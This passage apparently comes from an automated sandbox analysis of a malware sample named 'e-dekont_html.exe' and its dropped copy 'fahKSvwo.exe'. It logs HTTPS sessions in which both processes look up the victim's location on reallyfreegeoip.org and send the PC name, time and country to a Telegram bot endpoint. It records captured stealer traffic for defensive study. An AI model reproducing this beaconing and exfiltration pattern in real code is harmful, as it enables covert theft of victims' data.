                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ih4bTY75ujwQ%2Fp%2Fc2HsPfEU2oAVyUVuO40H2OiyjEuEQNYLLMc0ffDjbPZox%2Bp1aP5zywAz%2B4yZHrgpro4fj3xk7%2FBIubRLmmv%2BKS8OWJPRXBgvEj6f6QdZaQnn%2FADdNbnMbC%2FpN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e568458392fc335-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1664766&cwnd=163&unsent_bytes=0&cid=8f2e053503bfdef4&ts=147&x=0"
                                                                                                                                                        2024-11-20 06:52:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.449760188.114.96.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:23 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:24 UTC860INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:23 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49452
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FW3l7X0%2B0Y2ed3wKKFDfSeCoIjfn9sgyVoQ%2BKRNO29ddCJvubH0bu4Z3Xv4Ba8ulWpodiEB7mp70Qg4ulr7%2Fo%2BQZ8wlbfb8X9KyrfIWDrHluYq%2BmwLWL%2Fq0cXVmYifed%2FflvU228"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e568459cfbe726e-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1837&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1597374&cwnd=217&unsent_bytes=0&cid=87292c60bf089f32&ts=160&x=0"
                                                                                                                                                        2024-11-20 06:52:24 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.449765188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:26 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:26 UTC858INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:26 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49455
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQIMMFRdFEWMor4585O%2BllXA2a2ulZPE8h9sOty0rTSLIbQ6tI50SEOVYMyNoJdL%2FR%2F1AlqFejMR%2FGMlUWBIHLeXvMV29LHeyW1DPFtmKb%2FiKNXZfepXd%2FRxfUZ5ARjKRqAc47S%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e5684671ae815d7-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1792510&cwnd=225&unsent_bytes=0&cid=56bf3b6112d8ab0e&ts=137&x=0"
                                                                                                                                                        2024-11-20 06:52:26 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.461280188.114.96.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:26 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:26 UTC850INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:26 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49455
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKlHiy3nvCs7kJHZ1eyDlrhDapP8HpIdBUasjHKtKkFEQ%2F4fTpZ04UuZTUz3qNTkLLsdr36LcDRRBjCGSP9uUXsR%2FRF5YSx0lcc0CKtzamje7mSook2S%2FEwXzYxEkMK4hcs87HWE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e5684685a1143f4-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1538&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1825000&cwnd=186&unsent_bytes=0&cid=f005cf963368936d&ts=157&x=0"
                                                                                                                                                        2024-11-20 06:52:26 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.461282149.154.167.2204437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:27 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:27 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:27 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 55
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                        2024-11-20 06:52:27 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.461283188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:27 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:27 UTC854INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:27 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49456
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asVqlQbAXwFi7Annt5%2FIt7y8oH8RV%2BHp9%2BrkBbv1AJx8pXwSY2TB%2B4z8NLL2467SJK1VuT19juMkdRTHuAElBWvT%2B8kvVmDWP38CnFmjOcXZWVjjfVTCYyf7SaISy6xXjyYoVPkc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e5684700d128c8a-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2009&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1461461&cwnd=247&unsent_bytes=0&cid=bc4ebf3307c71e9e&ts=157&x=0"
                                                                                                                                                        2024-11-20 06:52:27 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        16192.168.2.461285188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:29 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:29 UTC852INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:29 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49458
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QFIbALN%2BRX8eCytwoQtsteFiR1mvMPAldWmAJCUvnxAJZlZLiB3heP1aBLMtpBRXiOY9C0l3At3MBQKr%2FDLlqzcuIHhF5%2FijfLCHNZxUilUBD5VmprxJCelaqeXBg3zAFuk8%2Fsiu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56847dbff24399-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2350&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1145996&cwnd=238&unsent_bytes=0&cid=aac13ba7e933901f&ts=151&x=0"
                                                                                                                                                        2024-11-20 06:52:29 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        17192.168.2.461287188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:30 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:31 UTC847INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:31 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49460
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAmUmLbKs2MIXClBD0V1PoSZ13pNlqmc1rOI4nrH2rkZ1WqK2XgL6Jh93fclylOvtpFrcJQSlhVHtht5ka19dfp%2FURbwmgq3PoHfgUEici07qKcrYVmF13aRe2%2F1PSw6c8gsbC3v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e568485d9717292-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1968&sent=6&recv=6&lost=0&retrans=1&sent_bytes=4240&recv_bytes=698&delivery_rate=235737&cwnd=253&unsent_bytes=0&cid=d19b7feee4aa9e1e&ts=168&x=0"
                                                                                                                                                        2024-11-20 06:52:31 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        18192.168.2.461289188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:32 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:32 UTC850INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:32 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49461
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KbcABO6sp%2Fb4cdgPQOA9vqXAkHYdK1%2Ftfzxh1dCrS0PNeVKdFRTWkPuz7%2BEPHqsEcOEsH6Vm1ZPwLkuzRYjQo5k66afu4cU1DvDL1BPNNEt7YStrgTX40Aoxl3YLnVCZwS9pBgE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56848cc9d4c463-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1931216&cwnd=159&unsent_bytes=0&cid=64719943dae0da0f&ts=155&x=0"
                                                                                                                                                        2024-11-20 06:52:32 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.461290149.154.167.2204437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:33 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:32 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 55
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
